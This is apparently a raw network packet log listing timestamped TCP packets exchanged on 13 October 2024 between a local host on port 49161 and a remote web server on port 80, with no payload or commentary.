Oct 13, 2024 07:28:59.820559025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820559978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820583105 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820596933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820620060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821163893 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821192980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821218014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821225882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821225882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821242094 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821259022 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821273088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821285009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821300030 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821315050 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821329117 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821337938 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821357012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821378946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821384907 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821398020 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821413994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.821427107 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.821450949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822103977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822123051 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822146893 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822159052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822159052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822169065 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822182894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822191000 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822204113 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822212934 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822231054 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822235107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822248936 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822256088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822268963 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822277069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822294950 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822299004 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822319984 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822329044 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.822339058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822381973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.822381973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823081970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823102951 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823122978 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823136091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823136091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823143959 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823158979 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823165894 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823178053 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823189020 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823200941 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823203087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823227882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823234081 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823246002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823260069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823282003 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823282957 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823298931 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823338032 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823358059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.823956966 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.823986053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824007988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824012041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824028969 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824038982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824047089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824065924 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824089050 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824093103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824110031 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824117899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824127913 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824141979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.824161053 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.824177980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903687000 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903744936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903773069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903808117 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903832912 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903860092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903862953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903862953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903862953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903862953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903862953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903888941 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.903947115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.903947115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904161930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904181957 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904205084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904227018 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904337883 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904337883 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904339075 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904339075 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904556036 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904572010 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904602051 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904618025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904654026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904901981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904921055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904943943 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904958010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904958010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904966116 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.904979944 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.904990911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905015945 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905016899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905036926 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905045986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905055046 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905073881 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905087948 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905119896 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905704975 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905754089 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905756950 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905781031 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905797005 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905817032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905834913 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905843973 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905855894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905870914 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905884981 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905910015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905920982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905947924 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.905968904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.905989885 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906671047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906702042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906723976 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906728029 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906745911 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906759977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906799078 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906799078 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906805992 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906831980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906856060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906858921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906876087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906886101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906898975 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906912088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906929016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906939030 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.906949043 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.906985044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907618999 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907639027 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907661915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907669067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907681942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907700062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907700062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907707930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907721043 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907735109 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907751083 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907763004 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907772064 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907788038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907802105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907814980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.907824993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.907854080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908504009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908528090 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908551931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908559084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908560038 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908581972 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908586979 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908605099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908649921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908652067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908652067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908678055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908703089 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908711910 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908711910 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908731937 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908736944 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908766031 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.908808947 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.908808947 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909426928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909476995 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909487009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909516096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909542084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909543991 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909543991 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909568071 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909586906 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909596920 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909605980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909625053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909643888 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909653902 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909663916 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909682035 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.909702063 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.909725904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910192013 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910242081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910306931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910330057 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910352945 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910355091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910377026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910386086 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910398006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910413980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910438061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910444021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910459042 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910473108 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910481930 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910501003 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.910518885 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.910538912 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911294937 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911314964 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911333084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911351919 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911351919 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911365986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911374092 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911406994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911417007 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911432028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911456108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911470890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911477089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911490917 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911513090 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.911513090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911546946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.911546946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912028074 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912050009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912067890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912084103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912084103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912091970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912106037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912115097 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912128925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912151098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912168980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912178040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912193060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912204027 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912213087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912233114 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912256956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912261009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912277937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912290096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912307024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912333012 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.912950993 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912971020 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.912993908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913012028 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913012028 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913017988 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913033009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913044930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913053989 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913072109 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913089037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913095951 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913106918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913124084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913137913 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913184881 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913202047 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913211107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913220882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913238049 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913249969 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913264990 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913275003 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913304090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913747072 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913774014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.913794994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.913820028 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994143963 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994180918 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994201899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994339943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994339943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994339943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994350910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994371891 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994434118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994434118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994462967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994484901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994522095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994523048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994712114 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994731903 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994751930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994771957 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994791985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.994910002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994910002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994910955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994910955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.994910955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995131016 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995146036 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995172024 CEST	80	49161	104.168.7.25	192.168.2.22
